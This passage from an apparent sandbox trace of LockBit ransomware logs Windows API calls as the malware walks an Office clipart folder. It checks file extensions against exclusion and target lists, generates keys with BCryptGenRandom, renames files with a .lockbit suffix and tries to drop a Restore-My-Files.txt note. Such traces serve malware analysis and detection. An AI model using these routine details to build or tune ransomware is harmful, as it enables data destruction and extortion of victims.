lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.417] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.417] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.417] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.418] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.418] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG.lockbit") returned 72 [0168.418] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02053j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0168.425] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.425] malloc (_Size=0x40068) returned 0x3df0008 [0168.425] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27388) returned 1 [0168.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0168.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0168.426] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.428] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.428] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.428] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.430] free (_Block=0x1fa2ed8) [0168.430] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.430] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.430] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.430] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b7f200, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x80b7f200, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02058U.BMP", cAlternateFileName="")) returned 1 [0168.430] lstrcmpiW (lpString1=".", lpString2="PH02058U.BMP") returned -1 [0168.430] lstrcmpiW (lpString1="..", lpString2="PH02058U.BMP") returned -1 [0168.430] PathFindExtensionW (pszPath="PH02058U.BMP") returned=".BMP" [0168.430] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.430] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.430] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.430] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.430] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.431] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.431] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.431] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.432] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.432] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02058U.BMP") returned 1 [0168.433] lstrcmpiW (lpString1="ntldr", lpString2="PH02058U.BMP") returned -1 [0168.433] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02058U.BMP") returned -1 [0168.433] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02058U.BMP") returned -1 [0168.433] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02058U.BMP") returned -1 [0168.433] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02058U.BMP") returned 1 [0168.433] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02058U.BMP") returned -1 [0168.433] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.433] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP") returned=".BMP" [0168.433] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.433] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.433] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.434] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.434] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP.lockbit") returned 72 [0168.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02058u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0168.435] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.435] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.435] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31968) returned 1 [0168.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.437] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.441] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.441] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.441] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.443] free (_Block=0x1fa2ed8) [0168.443] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.443] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.443] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c73f500, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c73f500, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02062U.BMP", cAlternateFileName="")) returned 1 [0168.444] lstrcmpiW (lpString1=".", lpString2="PH02062U.BMP") returned -1 [0168.444] lstrcmpiW (lpString1="..", lpString2="PH02062U.BMP") returned -1 [0168.444] PathFindExtensionW (pszPath="PH02062U.BMP") returned=".BMP" [0168.444] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.444] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.444] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.444] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.444] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.444] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.445] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.445] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02062U.BMP") returned 1 [0168.445] lstrcmpiW (lpString1="ntldr", lpString2="PH02062U.BMP") returned -1 [0168.445] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02062U.BMP") returned -1 [0168.445] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02062U.BMP") returned -1 [0168.445] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02062U.BMP") returned -1 [0168.445] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02062U.BMP") returned 1 [0168.445] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02062U.BMP") returned -1 [0168.446] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.446] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP") returned=".BMP" [0168.446] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.446] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.446] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.447] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.447] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP.lockbit") returned 72 [0168.447] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02062u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0168.448] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.448] malloc (_Size=0x40068) returned 0x3df0008 [0168.448] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31968) returned 1 [0168.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0168.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0168.449] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.459] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.459] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.460] free (_Block=0x1fa2ed8) [0168.460] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.460] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.460] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.460] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa943ea00, ftCreationTime.dwHighDateTime=0x1bd4e5c, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa943ea00, ftLastWriteTime.dwHighDateTime=0x1bd4e5c, nFileSizeHigh=0x0, nFileSizeLow=0x7297, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02069J.JPG", cAlternateFileName="")) returned 1 [0168.460] lstrcmpiW (lpString1=".", lpString2="PH02069J.JPG") returned -1 [0168.460] lstrcmpiW (lpString1="..", lpString2="PH02069J.JPG") returned -1 [0168.460] PathFindExtensionW (pszPath="PH02069J.JPG") returned=".JPG" [0168.461] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.461] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.461] 